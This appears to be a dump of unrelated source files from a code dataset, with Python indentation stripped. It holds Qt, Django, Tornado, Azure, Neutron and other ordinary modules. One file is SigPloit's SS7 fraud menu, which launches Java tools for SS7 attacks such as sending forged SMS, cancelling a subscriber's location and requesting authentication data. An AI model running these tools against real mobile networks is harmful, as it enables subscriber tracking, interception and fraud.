" \"1,2,3,4,5\" ")
self.grouping_table.horizontalHeaderItem(2).setToolTip("The number of detectors in the group.")
def num_rows(self):
return self.grouping_table.rowCount()
def num_cols(self):
return self.grouping_table.columnCount()
def notify_data_changed(self):
if not self._updating:
self.dataChanged.emit()
# ------------------------------------------------------------------------------------------------------------------
# Adding / removing table entries
# ------------------------------------------------------------------------------------------------------------------
def add_entry_to_table(self, row_entries):
assert len(row_entries) == self.grouping_table.columnCount()
row_position = self.grouping_table.rowCount()
self.grouping_table.insertRow(row_position)
for i, entry in enumerate(row_entries):
item = QtGui.QTableWidgetItem(entry)
if group_table_columns[i] == group_table_columns[0]:
# column 0 : group name
group_name_widget = table_utils.ValidatedTableItem(self._validate_group_name_entry)
group_name_widget.setText(entry)
self.grouping_table.setItem(row_position, 0, group_name_widget)
self.grouping_table.item(row_position, 0).setToolTip(entry)
item.setFlags(QtCore.Qt.ItemIsEnabled)
item.setFlags(QtCore.Qt.ItemIsSelectable)
if group_table_columns[i] == group_table_columns[1]:
# column 1 : detector IDs
detector_widget = table_utils.ValidatedTableItem(self._validate_detector_ID_entry)
detector_widget.setText(entry)
self.grouping_table.setItem(row_position, 1, detector_widget)
self.grouping_table.item(row_position, 1).setToolTip(entry)
if group_table_columns[i] == group_table_columns[2]:
# column 2 : number of detectors
item.setFlags(QtCore.Qt.ItemIsEnabled)
item.setFlags(QtCore.Qt.ItemIsSelectable)
self.grouping_table.setItem(row_position, i, item)
def _get_selected_row_indices(self):
return list(set(index.row() for index in self.grouping_table.selectedIndexes()))
def get_selected_group_names(self):
indexes = self._get_selected_row_indices()
return [str(self.grouping_table.item(i, 0).text()) for i in indexes]
def remove_selected_groups(self):
indices = self._get_selected_row_indices()
for index in reversed(sorted(indices)):
self.grouping_table.removeRow(index)
def remove_last_row(self):
last_row = self.grouping_table.rowCount() - 1
if last_row >= 0:
self.grouping_table.removeRow(last_row)
def enter_group_name(self):
new_group_name, ok = QtGui.QInputDialog.getText(self, 'Group Name', 'Enter name of new group:')
if ok:
return new_group_name
# ------------------------------------------------------------------------------------------------------------------
# Context menu on right-click in the table
# ------------------------------------------------------------------------------------------------------------------
def _context_menu_add_group_action(self, slot):
add_group_action = QtGui.QAction('Add Group', self)
if len(self._get_selected_row_indices()) > 0:
add_group_action.setEnabled(False)
add_group_action.triggered.connect(slot)
return add_group_action
def _context_menu_remove_group_action(self, slot):
if len(self._get_selected_row_indices()) > 1:
# use plural if >1 item selected
remove_group_action = QtGui.QAction('Remove Groups', self)
else:
remove_group_action = QtGui.QAction('Remove Group', self)
if self.num_rows() == 0:
remove_group_action.setEnabled(False)
remove_group_action.triggered.connect(slot)
return remove_group_action
def _context_menu_add_pair_action(self, slot):
add_pair_action = QtGui.QAction('Add Pair', self)
if len(self._get_selected_row_indices()) != 2:
add_pair_action.setEnabled(False)
add_pair_action.triggered.connect(slot)
return add_pair_action
def contextMenuEvent(self, _event):
"""Overridden method"""
self.menu = QtGui.QMenu(self)
self.add_group_action = self._context_menu_add_group_action(self.add_group_button.clicked.emit)
self.remove_group_action = self._context_menu_remove_group_action(self.remove_group_button.clicked.emit)
self.add_pair_action = self._context_menu_add_pair_action(self.add_pair_requested)
if self._disabled:
self.add_group_action.setEnabled(False)
self.remove_group_action.setEnabled(False)
self.add_pair_action.setEnabled(False)
self.menu.addAction(self.add_group_action)
self.menu.addAction(self.remove_group_action)
self.menu.addAction(self.add_pair_action)
self.menu.popup(QtGui.QCursor.pos())
# ------------------------------------------------------------------------------------------------------------------
# Slot connections
# ------------------------------------------------------------------------------------------------------------------
def on_user_changes_group_name(self, slot):
self._validate_group_name_entry = slot
def on_user_changes_detector_IDs(self, slot):
self._validate_detector_ID_entry = slot
def on_add_group_button_clicked(self, slot):
self.add_group_button.clicked.connect(slot)
def on_remove_group_button_clicked(self, slot):
self.remove_group_button.clicked.connect(slot)
def on_table_data_changed(self, slot):
self._on_table_data_changed = slot
def add_pair_requested(self):
selected_names = self.get_selected_group_names()
self.addPairRequested.emit(selected_names[0], selected_names[1])
def on_cell_changed(self, _row, _col):
if not self._updating:
self._on_table_data_changed(_row, _col)
def on_user_changes_min_range_source(self, slot):
self.group_range_use_first_good_data.stateChanged.connect(slot)
def on_user_changes_max_range_source(self, slot):
self.group_range_use_last_data.stateChanged.connect(slot)
def on_user_changes_group_range_min_text_edit(self, slot):
self.group_range_min.editingFinished.connect(slot)
def on_user_changes_group_range_max_text_edit(self, slot):
self.group_range_max.editingFinished.connect(slot)
# ------------------------------------------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------------------------------------------
def get_table_item_text(self, row, col):
return self.grouping_table.item(row, col).text()
def get_table_contents(self):
if self._updating:
return []
ret = []
for row in range(self.num_rows()):
row_list = []
for col in range(self.num_cols()):
row_list.append(str(self.grouping_table.item(row, col).text()))
ret.append(row_list)
return ret
def clear(self):
# Go backwards to preserve indices
for row in reversed(range(self.num_rows())):
self.grouping_table.removeRow(row)
# ------------------------------------------------------------------------------------------------------------------
# Enabling and disabling editing and updating of the widget
# ------------------------------------------------------------------------------------------------------------------
def disable_updates(self):
"""Usage : """
self._updating = True
def enable_updates(self):
"""Usage : """
self._updating = False
def disable_editing(self):
self.disable_updates()
self._disabled = True
self._disable_buttons()
self._disable_all_table_items()
self._disable_group_ranges()
self.enable_updates()
def enable_editing(self):
self.disable_updates()
self._disabled = False
self._enable_buttons()
self._enable_all_table_items()
self._enable_group_ranges()
self.enable_updates()
def _enable_group_ranges(self):
self.group_range_use_first_good_data.setEnabled(True)
self.group_range_use_last_data.setEnabled(True)
if not self.group_range_use_first_good_data.isChecked():
self.group_range_min.setEnabled(True)
if not self.group_range_use_last_data.isChecked():
self.group_range_max.setEnabled(True)
def _disable_group_ranges(self):
self.group_range_use_first_good_data.setEnabled(False)
self.group_range_use_last_data.setEnabled(False)
self.group_range_min.setEnabled(False)
self.group_range_max.setEnabled(False)
def _enable_buttons(self):
self.add_group_button.setEnabled(True)
self.remove_group_button.setEnabled(True)
def _disable_buttons(self):
self.add_group_button.setEnabled(False)
self.remove_group_button.setEnabled(False)
def _disable_all_table_items(self):
for row in range(self.num_rows()):
for col in range(self.num_cols()):
item = self.grouping_table.item(row, col)
item.setFlags(QtCore.Qt.ItemIsSelectable)
def _enable_all_table_items(self):
for row in range(self.num_rows()):
for col in range(self.num_cols()):
item = self.grouping_table.item(row, col)
if group_table_columns[col] == 'detector_ids':
item.setFlags(QtCore.Qt.ItemIsSelectable |
QtCore.Qt.ItemIsEditable |
QtCore.Qt.ItemIsEnabled)
else:
# Group name and number of detectors should remain un-editable
item.setFlags(QtCore.Qt.ItemIsSelectable)
def get_group_range(self):
return str(self.group_range_min.text()), str(self.group_range_max.text())
def set_group_range(self, range):
self.group_range_min.setText(range[0])
self.group_range_max.setText(range[1])
| gpl-3.0 | -4,333,006,931,446,137,300 | 43.188976 | 120 | 0.59153 | false | 4.063722 | false | false | false |
joelmir/job_test_questions | candidates/models.py | 1 | 2370 | # -*- coding: utf-8 -*-
from django.db import models
from questions.models import Question
from django.core.mail import send_mail
from django.conf import settings
class Candidate(models.Model):
name = models.CharField(max_length=200)
email = models.EmailField()
def __unicode__(self):
return u'{0} - {1}'.format(self.name, self.email)
def send_mail(self):
questions_id = Answer.objects.filter(candidate=self, grade__gte=7).values_list('question_id')
questions = [question.lower().strip() for question in Question.objects.filter(id__in=questions_id).values_list('question_text', flat=True)]
default_mail = True
if 'html' in questions and 'css' in questions and 'javascript' in questions:
default_mail = False
print 'Front-End'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Front-End entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if 'python' in questions and 'django' in questions:
default_mail = False
print 'Back-End'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Back-End entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if 'desenvolvedor ios' in questions or 'desenvolvedor android' in questions:
default_mail = False
print 'Mobile'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Mobile entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if default_mail:
print 'Default: ', self.email
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador entraremos em contato.''' , settings.DEFAULT_FROM ,[self.email], fail_silently=False)
class Answer(models.Model):
candidate = models.ForeignKey(Candidate)
question = models.ForeignKey(Question)
grade = models.IntegerField()
def __unicode__(self):
return u'{0} - {1} - {2}'.format(self.candidate.name, self.question, self.grade)
| mit | 8,692,020,386,437,051,000 | 42.814815 | 147 | 0.679628 | false | 3.459064 | false | false | false |
ISISComputingGroup/EPICS-inst_servers | CollisionAvoidanceMonitor/geometry.py | 1 | 2255 | import numpy as np
import ode
from CollisionAvoidanceMonitor.transform import Transformation
class GeometryBox(object):
def __init__(self, space, position=(0, 0, 0), size=(1, 1, 1), color=(1, 1, 1), oversize=1, name=None):
# Set parameters for drawing the body
self.color = color
self.size = list(size)
self.oversize = oversize
# Create a box geom for collision detection
self.geom = ode.GeomBox(space, lengths=[s + 2 + oversize for s in self.size])
self.geom.setPosition(position)
# A friendly name
self.name = name
# Set the size of the ODE geometry
def set_size(self, x=None, y=None, z=None, oversize=None):
# Only need to set the size of dimensions supplied
if x is not None:
self.size[0] = x
if y is not None:
self.size[1] = y
if z is not None:
self.size[2] = z
if oversize is not None:
self.oversize = oversize
self.geom.setLengths([s + 2 * self.oversize for s in self.size])
# Set the transform for the geometry
def set_transform(self, transform):
# Get the rotation and position elements from the transformation matrix
rot, pos = transform.get_rotation_matrix(), transform.get_position_matrix()
# Reshape the rotation matrix into a ODE friendly format
rot = np.reshape(rot, 9)
# Apply the translation and rotation to the ODE geometry
self.geom.setPosition(pos)
self.geom.setRotation(rot)
def get_transform(self):
t = Transformation()
t.join(self.geom.getRotation(), self.geom.getPosition())
return t
def get_vertices(self):
vertices = np.array([(-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5),
(0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5),
(-0.5, -0.5, -0.5),
(0.5, -0.5, -0.5),
(0.5, 0.5, -0.5),
(-0.5, 0.5, -0.5)])
vertices *= self.geom.getLengths()
t = self.get_transform()
vertices = [t.evaluate(v) for v in vertices]
return vertices
| bsd-3-clause | -474,506,855,969,731,600 | 33.692308 | 106 | 0.54235 | false | 3.690671 | false | false | false |
purplewall1206/musicbox | NEMbox/scrollstring.py | 13 | 1403 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from time import time
import locale
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
class scrollstring:
def __init__(self, content, START):
self.content = content # the true content of the string
self.display = content # the displayed string
self.START = START//1 # when this instance is created
self.update()
def update(self):
self.display = self.content
curTime = time()//1
offset = max(int((curTime - self.START) % len(self.content)) - 1, 0)
while offset > 0:
if self.display[0] > chr(127):
offset -= 1
self.display = self.display[3:] + self.display[:3]
else:
offset -= 1
self.display = self.display[1:] + self.display[:1]
# self.display = self.content[offset:] + self.content[:offset]
def __repr__(self):
return self.display
# determine the display length of a string
def truelen(string):
"""
It appears one Asian character takes two spots, but __len__
counts it as three, so this function counts the dispalyed
length of the string.
>>> truelen('abc')
3
>>> truelen('你好')
4
>>> truelen('1二3')
4
>>> truelen('')
0
"""
return len(string) - sum(1 for c in string if c > chr(127))/3
| mit | -311,629,064,321,845,250 | 25.358491 | 76 | 0.573372 | false | 3.745308 | false | false | false |
SigPloiter/SigPloit | ss7/fraud.py | 1 | 5988 | #!/usr/bin/env python
"""
Created on 1 Feb 2018
@author: loay
"""
import os
import sys
import time
from subprocess import *
import sigploit
import ss7main
simsi_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/simsi')
mtsms_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/mtsms')
cl_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/cl')
isd_path = os.path.join(os.getcwd(),'ss7/attacks/fraud/isd')
sai_path = os.path.join(os.getcwd(),'ss7/attacks/fraud/sai')
def simsi():
jar_file = 'SendIMSI.jar'
try:
sendIMSI = check_call(['java', '-jar', os.path.join(simsi_path, jar_file)])
if sendIMSI == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0m%s Failed to Launch, %s" %(jar_file, e.message)
time.sleep(2)
ss7main.ss7fraud()
def mtsms():
jar_file = 'MTForwardSMS.jar'
try:
mtForwardSMS = check_call(['java', '-jar', os.path.join(mtsms_path, jar_file)])
if mtForwardSMS == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mMTForwardSMS Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def cl():
jar_file = 'CancelLocation.jar'
try:
cancelLocation = check_call(['java', '-jar', os.path.join(cl_path, jar_file)])
if cancelLocation == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mCancelLocation Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def isd():
jar_file = 'InsertSubscriberData.jar'
try:
insertSD = check_call(['java','-jar', os.path.join(isd_path,jar_file)])
if insertSD == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.Fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y'or attack_menu =='yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu =='no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu =='yes':
sigploit.mainMenu()
elif main_menu =='exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mInsertSubscriberData Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def sai():
jar_file = 'SendAuthenticationInfo.jar'
try:
sendAuth = check_call(['java', '-jar', os.path.join(sai_path, jar_file)])
if sendAuth == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0m%s Failed to Launch, %s" %(jar_file, e.message)
time.sleep(2)
ss7main.ss7fraud() | mit | -2,386,668,206,320,904,700 | 37.146497 | 101 | 0.519038 | false | 3.31378 | false | false | false |
CtrlC-Root/cse3341 | Core/cse3341/pt/operand.py | 1 | 1699 | from ..token import Token
from .node import Node
from .constant import Constant
from .identifier import Identifier
from .expression import Expression
class Operand(Node):
"""
An operand.
"""
def __init__(self):
"""
Create the operand.
"""
self.value = None
@classmethod
def parse(cls, tokenizer, identifiers):
"""
Parse an operand.
"""
operand = Operand()
if tokenizer.get_token() == Token.INTEGER_CONSTANT:
operand.value = Constant.parse(tokenizer, identifiers)
elif tokenizer.get_token() == Token.IDENTIFIER:
operand.value = Identifier.parse(tokenizer, identifiers)
else:
cls.extract_token(tokenizer, Token.OPENING_PARENTHESIS)
operand.value = Expression.parse(tokenizer, identifiers)
cls.extract_token(tokenizer, Token.CLOSING_PARENTHESIS)
return operand
def evaluate(self, identifiers):
"""
Evaluate the operand and return its value.
"""
if isinstance(self.value, Expression):
return self.value.evaluate(identifiers)
elif isinstance(self.value, Identifier):
return identifiers.get_value(self.value.name)
else:
return self.value.value
def __str__(self):
"""
Human-readable string representation.
"""
parts = [self.value]
if isinstance(self.value, Expression):
parts = [
Token.OPENING_PARENTHESIS.value[1],
self.value,
Token.CLOSING_PARENTHESIS.value[1]]
return " ".join(map(lambda d: str(d), parts))
| mit | -5,072,925,527,626,581,000 | 24.742424 | 68 | 0.58505 | false | 4.654795 | false | false | false |
elric/virtaal-debian | virtaal/modes/quicktransmode.py | 6 | 1883 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008-2009 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from virtaal.support.set_enumerator import UnionSetEnumerator
from virtaal.support.sorted_set import SortedSet
from basemode import BaseMode
class QuickTranslateMode(BaseMode):
"""Quick translate mode - Include only untranslated and fuzzy units."""
name = 'QuickTranslate'
display_name = _("Incomplete")
widgets = []
# INITIALIZERS #
def __init__(self, controller):
"""Constructor.
@type controller: virtaal.controllers.ModeController
@param controller: The ModeController that managing program modes."""
self.controller = controller
# METHODS #
def selected(self):
cursor = self.controller.main_controller.store_controller.cursor
if not cursor or not cursor.model:
return
indices = list(UnionSetEnumerator(
SortedSet(cursor.model.stats['untranslated']),
SortedSet(cursor.model.stats['fuzzy'])
).set)
if not indices:
self.controller.select_default_mode()
return
cursor.indices = indices
def unselected(self):
pass
| gpl-2.0 | -1,105,703,208,720,473,100 | 30.383333 | 81 | 0.688263 | false | 4.279545 | false | false | false |
Halframe/ihome_20161122 | handlers/Profile.py | 1 | 4839 | # coding=utf-8
import re
import logging
from .BaseHandler import BaseHandler
from utils.common import required_logined
from utils.response_code import RET
from utils.image_storage import storage
from config import image_url_prefix
class ProfileHandler(BaseHandler):
"""个人中心"""
@required_logined
def get(self):
user_id = self.session.data["user_id"]
try:
ret = self.db.get(
"select up_name, up_mobile, up_avatar from ih_user_profile where up_user_id=%(user_id)s", user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库查询错误"})
if not ret:
return self.write({"errno": RET.NODATA, "errmsg": "无该用户信息"})
if ret["up_avatar"]:
img_url = image_url_prefix + ret["up_avatar"]
else:
img_url = None
data = {
"user_id": user_id,
"name": ret["up_name"],
"mobile": ret["up_mobile"],
"avatar": img_url,
}
return self.write({"errno": RET.OK, "errmsg": "OK", "data": data})
class AvatarHandler(BaseHandler):
"""用户头像修改"""
@required_logined
def post(self):
user_id = self.session.data["user_id"]
try:
avatar = self.request.files["avatar"][0]["body"]
except Exception as e:
logging.error(e)
return self.write({"errno": RET.PARAMERR, "errmsg": "参数错误"})
try:
avatar_name = storage(avatar)
except Exception as e:
logging.error(e)
avatar_name = None
return self.write({"errno": RET.THIRDERR, "errmsg": "Qiniu Error"})
try:
ret = self.db.execute(
"update ih_user_profile set up_avatar=%(avatar)s where up_user_id=%(user_id)s", avatar=avatar_name, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库错误"})
avatar_url = image_url_prefix + avatar_name
self.write({"errno": RET.OK, "errmsg": "OK", "avatar": avatar_url})
class NameHandler(BaseHandler):
"""
修改用户名
@param: user_id, 从session获取用户id,要求用户登录
@param: user_name, 用户提交的新用户名
@return: errno,返回的消息代码;errmsg,返回结果的消息,以及返回其他数据
"""
@required_logined
def post(self):
user_id = self.session.data["user_id"]
user_name = self.json_args.get("user_name")
if user_name in (None, ""):
return self.write({"errno": RET.PARAMERR, "errmsg": "修改的用户名不能为空"})
try:
self.db.execute("update ih_user_profile set up_name=%(user_name)s where up_user_id=%(user_id)s", user_name=user_name, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "用户名已存在"})
self.session.data["name"] = user_name
self.session.save()
return self.write({"errno": RET.OK, "errmsg": "OK", "new_username": user_name})
class AuthHandler(BaseHandler):
"""
用户实名认证
"""
@required_logined
def get(self):
user_id = self.session.data["user_id"]
try:
ret = self.db.get("select up_real_name, up_id_card from ih_user_profile where up_user_id=%(user_id)s", user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库查询错误"})
if ret["up_id_card"] not in (None, ""):
id_card = ret["up_id_card"]
id_card = id_card[:4] + "*"*len(id_card[4:-4]) + id_card[-4:]
return self.write({"errno": RET.OK, "errmsg": "OK", "real_name": ret["up_real_name"], "id_card": id_card})
@required_logined
def post(self):
real_name = self.json_args.get("real_name")
id_card = self.json_args.get("id_card")
if not all((real_name, id_card)):
return self.write({"errno": RET.PARAMERR, "errmsg": "参数不完整"})
user_id = self.session.data["user_id"]
try:
self.db.execute("update ih_user_profile set up_real_name=%(real_name)s, up_id_card=%(id_card)s where up_user_id=%(user_id)s", real_name=real_name, id_card=id_card, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库更新失败"})
id_card = id_card[:4] + "*"*len(id_card[4:-4]) + id_card[-4:]
return self.write({"errno":RET.OK, "errmsg":"OK", "real_name": real_name, "id_card": id_card})
| gpl-3.0 | -3,416,722,500,883,955,700 | 34.3 | 192 | 0.56679 | false | 3.143151 | false | false | false |
ConnectBox/wifi-test-framework | ansible/plugins/mitogen-0.2.3/ansible_mitogen/plugins/connection/mitogen_local.py | 1 | 3082 | # Copyright 2017, David Wilson
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
import os.path
import sys
try:
import ansible_mitogen.connection
except ImportError:
base_dir = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(base_dir, '../../..')))
del base_dir
import ansible_mitogen.connection
import ansible_mitogen.process
if sys.version_info > (3,):
viewkeys = dict.keys
elif sys.version_info > (2, 7):
viewkeys = dict.viewkeys
else:
viewkeys = lambda dct: set(dct)
def dict_diff(old, new):
"""
Return a dict representing the differences between the dicts `old` and
`new`. Deleted keys appear as a key with the value :data:`None`, added and
changed keys appear as a key with the new value.
"""
old_keys = viewkeys(old)
new_keys = viewkeys(dict(new))
out = {}
for key in new_keys - old_keys:
out[key] = new[key]
for key in old_keys - new_keys:
out[key] = None
for key in old_keys & new_keys:
if old[key] != new[key]:
out[key] = new[key]
return out
class Connection(ansible_mitogen.connection.Connection):
transport = 'local'
def get_default_cwd(self):
# https://github.com/ansible/ansible/issues/14489
return self.loader_basedir
def get_default_env(self):
"""
Vanilla Ansible local commands execute with an environment inherited
from WorkerProcess, we must emulate that.
"""
return dict_diff(
old=ansible_mitogen.process.MuxProcess.original_env,
new=os.environ,
)
| mit | 6,438,423,665,345,968,000 | 34.837209 | 79 | 0.711551 | false | 4.082119 | false | false | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2015_06_15/models/express_route_circuit_service_provider_properties.py | 10 | 1507 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExpressRouteCircuitServiceProviderProperties(Model):
"""Contains ServiceProviderProperties in an ExpressRouteCircuit.
:param service_provider_name: The serviceProviderName.
:type service_provider_name: str
:param peering_location: The peering location.
:type peering_location: str
:param bandwidth_in_mbps: The BandwidthInMbps.
:type bandwidth_in_mbps: int
"""
_attribute_map = {
'service_provider_name': {'key': 'serviceProviderName', 'type': 'str'},
'peering_location': {'key': 'peeringLocation', 'type': 'str'},
'bandwidth_in_mbps': {'key': 'bandwidthInMbps', 'type': 'int'},
}
def __init__(self, **kwargs):
super(ExpressRouteCircuitServiceProviderProperties, self).__init__(**kwargs)
self.service_provider_name = kwargs.get('service_provider_name', None)
self.peering_location = kwargs.get('peering_location', None)
self.bandwidth_in_mbps = kwargs.get('bandwidth_in_mbps', None)
| mit | -449,456,143,287,546,560 | 40.861111 | 84 | 0.631055 | false | 4.186111 | false | false | false |
citrix-openstack-build/neutron-lbaas | neutron_lbaas/services/loadbalancer/agent_scheduler.py | 2 | 5210 | # Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import joinedload
from neutron.common import constants
from neutron.db import agents_db
from neutron.db import agentschedulers_db
from neutron.db import model_base
from neutron.extensions import lbaas_agentscheduler
from neutron.i18n import _LW
from neutron.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class PoolLoadbalancerAgentBinding(model_base.BASEV2):
"""Represents binding between neutron loadbalancer pools and agents."""
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete='CASCADE'),
primary_key=True)
agent = orm.relation(agents_db.Agent)
agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id",
ondelete='CASCADE'),
nullable=False)
class LbaasAgentSchedulerDbMixin(agentschedulers_db.AgentSchedulerDbMixin,
lbaas_agentscheduler
.LbaasAgentSchedulerPluginBase):
def get_lbaas_agent_hosting_pool(self, context, pool_id, active=None):
query = context.session.query(PoolLoadbalancerAgentBinding)
query = query.options(joinedload('agent'))
binding = query.get(pool_id)
if (binding and self.is_eligible_agent(
active, binding.agent)):
return {'agent': self._make_agent_dict(binding.agent)}
def get_lbaas_agents(self, context, active=None, filters=None):
query = context.session.query(agents_db.Agent)
query = query.filter_by(agent_type=constants.AGENT_TYPE_LOADBALANCER)
if active is not None:
query = query.filter_by(admin_state_up=active)
if filters:
for key, value in filters.iteritems():
column = getattr(agents_db.Agent, key, None)
if column:
query = query.filter(column.in_(value))
return [agent
for agent in query
if self.is_eligible_agent(active, agent)]
def list_pools_on_lbaas_agent(self, context, id):
query = context.session.query(PoolLoadbalancerAgentBinding.pool_id)
query = query.filter_by(agent_id=id)
pool_ids = [item[0] for item in query]
if pool_ids:
return {'pools': self.get_pools(context, filters={'id': pool_ids})}
else:
return {'pools': []}
def get_lbaas_agent_candidates(self, device_driver, active_agents):
candidates = []
for agent in active_agents:
agent_conf = self.get_configuration_dict(agent)
